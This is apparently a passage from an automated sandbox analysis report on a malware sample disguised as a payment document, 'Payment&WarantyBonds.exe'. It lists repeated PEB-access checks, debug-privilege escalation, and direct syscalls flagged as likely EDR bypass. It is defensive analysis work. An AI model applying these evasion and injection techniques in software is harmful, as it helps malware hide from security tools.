Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h] 2_2_014B62A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h] 2_2_014B62A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h] 2_2_014B62A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h] 2_2_014B62A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A92BC mov eax, dword ptr fs:[00000030h] 2_2_014A92BC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A92BC mov eax, dword ptr fs:[00000030h] 2_2_014A92BC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A92BC mov ecx, dword ptr fs:[00000030h] 2_2_014A92BC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A92BC mov ecx, dword ptr fs:[00000030h] 2_2_014A92BC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01428550 mov eax, dword ptr fs:[00000030h] 2_2_01428550
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01428550 mov eax, dword ptr fs:[00000030h] 2_2_01428550
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141B562 mov eax, dword ptr fs:[00000030h] 2_2_0141B562
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145656A mov eax, dword ptr fs:[00000030h] 2_2_0145656A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145656A mov eax, dword ptr fs:[00000030h] 2_2_0145656A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145656A mov eax, dword ptr fs:[00000030h] 2_2_0145656A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145B570 mov eax, dword ptr fs:[00000030h] 2_2_0145B570
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145B570 mov eax, dword ptr fs:[00000030h] 2_2_0145B570
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01457505 mov eax, dword ptr fs:[00000030h] 2_2_01457505
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01457505 mov ecx, dword ptr fs:[00000030h] 2_2_01457505
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h] 2_2_014F4500
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h] 2_2_014F4500
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h] 2_2_014F4500
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h] 2_2_014F4500
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h] 2_2_014F4500
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h] 2_2_014F4500
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h] 2_2_014F4500
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DB52F mov eax, dword ptr fs:[00000030h] 2_2_014DB52F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h] 2_2_014CF525
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h] 2_2_014CF525
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h] 2_2_014CF525
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h] 2_2_014CF525
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h] 2_2_014CF525
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h] 2_2_014CF525
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h] 2_2_014CF525
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145D530 mov eax, dword ptr fs:[00000030h] 2_2_0145D530
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145D530 mov eax, dword ptr fs:[00000030h] 2_2_0145D530
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430535 mov eax, dword ptr fs:[00000030h] 2_2_01430535
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430535 mov eax, dword ptr fs:[00000030h] 2_2_01430535
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430535 mov eax, dword ptr fs:[00000030h] 2_2_01430535
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430535 mov eax, dword ptr fs:[00000030h] 2_2_01430535
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430535 mov eax, dword ptr fs:[00000030h] 2_2_01430535
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430535 mov eax, dword ptr fs:[00000030h] 2_2_01430535
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h] 2_2_0142D534
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h] 2_2_0142D534
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h] 2_2_0142D534
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h] 2_2_0142D534
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h] 2_2_0142D534
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h] 2_2_0142D534
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F5537 mov eax, dword ptr fs:[00000030h] 2_2_014F5537
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h] 2_2_0144E53E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h] 2_2_0144E53E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h] 2_2_0144E53E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h] 2_2_0144E53E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h] 2_2_0144E53E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014555C0 mov eax, dword ptr fs:[00000030h] 2_2_014555C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F55C9 mov eax, dword ptr fs:[00000030h] 2_2_014F55C9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E5CF mov eax, dword ptr fs:[00000030h] 2_2_0145E5CF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E5CF mov eax, dword ptr fs:[00000030h] 2_2_0145E5CF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014265D0 mov eax, dword ptr fs:[00000030h] 2_2_014265D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0145A5D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0145A5D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F35D7 mov eax, dword ptr fs:[00000030h] 2_2_014F35D7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F35D7 mov eax, dword ptr fs:[00000030h] 2_2_014F35D7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F35D7 mov eax, dword ptr fs:[00000030h] 2_2_014F35D7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149D5D0 mov eax, dword ptr fs:[00000030h] 2_2_0149D5D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149D5D0 mov ecx, dword ptr fs:[00000030h] 2_2_0149D5D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014495DA mov eax, dword ptr fs:[00000030h] 2_2_014495DA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014225E0 mov eax, dword ptr fs:[00000030h] 2_2_014225E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0144E5E7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0144E5E7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0144E5E7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0144E5E7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0144E5E7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0144E5E7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0144E5E7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0144E5E7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145C5ED mov eax, dword ptr fs:[00000030h] 2_2_0145C5ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145C5ED mov eax, dword ptr fs:[00000030h] 2_2_0145C5ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h] 2_2_014415F4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h] 2_2_014415F4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h] 2_2_014415F4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h] 2_2_014415F4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h] 2_2_014415F4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h] 2_2_014415F4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01422582 mov eax, dword ptr fs:[00000030h] 2_2_01422582
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01422582 mov ecx, dword ptr fs:[00000030h] 2_2_01422582
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01454588 mov eax, dword ptr fs:[00000030h] 2_2_01454588
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141758F mov eax, dword ptr fs:[00000030h] 2_2_0141758F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141758F mov eax, dword ptr fs:[00000030h] 2_2_0141758F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141758F mov eax, dword ptr fs:[00000030h] 2_2_0141758F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E59C mov eax, dword ptr fs:[00000030h] 2_2_0145E59C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014AB594 mov eax, dword ptr fs:[00000030h] 2_2_014AB594
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014AB594 mov eax, dword ptr fs:[00000030h] 2_2_014AB594
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A05A7 mov eax, dword ptr fs:[00000030h] 2_2_014A05A7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A05A7 mov eax, dword ptr fs:[00000030h] 2_2_014A05A7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A05A7 mov eax, dword ptr fs:[00000030h] 2_2_014A05A7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h] 2_2_014415A9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h] 2_2_014415A9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h] 2_2_014415A9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h] 2_2_014415A9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h] 2_2_014415A9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B35BA mov eax, dword ptr fs:[00000030h] 2_2_014B35BA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B35BA mov eax, dword ptr fs:[00000030h] 2_2_014B35BA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B35BA mov eax, dword ptr fs:[00000030h] 2_2_014B35BA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B35BA mov eax, dword ptr fs:[00000030h] 2_2_014B35BA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DF5BE mov eax, dword ptr fs:[00000030h] 2_2_014DF5BE
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h] 2_2_0144F5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h] 2_2_0144F5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h] 2_2_0144F5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h] 2_2_0144F5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h] 2_2_0144F5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h] 2_2_0144F5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h] 2_2_0144F5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h] 2_2_0144F5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h] 2_2_0144F5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014445B1 mov eax, dword ptr fs:[00000030h] 2_2_014445B1
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014445B1 mov eax, dword ptr fs:[00000030h] 2_2_014445B1
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h] 2_2_0142B440
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h] 2_2_0142B440
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h] 2_2_0142B440
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h] 2_2_0142B440
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h] 2_2_0142B440
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h] 2_2_0142B440
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h] 2_2_0145E443
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h] 2_2_0145E443
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h] 2_2_0145E443
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h] 2_2_0145E443
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h] 2_2_0145E443
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h] 2_2_0145E443
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h] 2_2_0145E443
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h] 2_2_0145E443
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141645D mov eax, dword ptr fs:[00000030h] 2_2_0141645D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DF453 mov eax, dword ptr fs:[00000030h] 2_2_014DF453
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144245A mov eax, dword ptr fs:[00000030h] 2_2_0144245A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01421460 mov eax, dword ptr fs:[00000030h] 2_2_01421460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01421460 mov eax, dword ptr fs:[00000030h] 2_2_01421460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01421460 mov eax, dword ptr fs:[00000030h] 2_2_01421460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01421460 mov eax, dword ptr fs:[00000030h] 2_2_01421460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01421460 mov eax, dword ptr fs:[00000030h] 2_2_01421460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h] 2_2_0143F460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h] 2_2_0143F460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h] 2_2_0143F460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h] 2_2_0143F460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h] 2_2_0143F460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h] 2_2_0143F460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014AC460 mov ecx, dword ptr fs:[00000030h] 2_2_014AC460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F547F mov eax, dword ptr fs:[00000030h] 2_2_014F547F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144A470 mov eax, dword ptr fs:[00000030h] 2_2_0144A470
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144A470 mov eax, dword ptr fs:[00000030h] 2_2_0144A470
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144A470 mov eax, dword ptr fs:[00000030h] 2_2_0144A470
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01458402 mov eax, dword ptr fs:[00000030h] 2_2_01458402
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01458402 mov eax, dword ptr fs:[00000030h] 2_2_01458402
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01458402 mov eax, dword ptr fs:[00000030h] 2_2_01458402
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144340D mov eax, dword ptr fs:[00000030h] 2_2_0144340D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A7410 mov eax, dword ptr fs:[00000030h] 2_2_014A7410
Enables debug privileges
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtOpenKeyEx: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryValueKey: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
